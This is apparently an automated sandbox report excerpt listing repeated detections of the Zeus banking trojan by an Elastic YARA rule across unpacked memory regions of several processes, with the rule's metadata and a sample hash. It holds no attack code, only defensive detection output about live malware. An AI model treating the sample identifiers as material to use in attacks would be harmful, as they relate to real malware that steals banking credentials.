    Source: 0.3.5AFlyarMds.exe.6ff110.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.16.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.cUKxeliGgCix.exe.1272000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2c90000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.25.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.28.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.26.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.37.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.406400.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.39.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.26.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.42.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2910000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.24e0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.30.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2a06c00.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.892000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.31.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.24.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 8.2.cUKxeliGgCix.exe.25c0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.cUKxeliGgCix.exe.2f60000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 27.2.cUKxeliGgCix.exe.14f2000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.24b0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.27.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.17.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.33.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.407000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2cf3c00.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.406400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
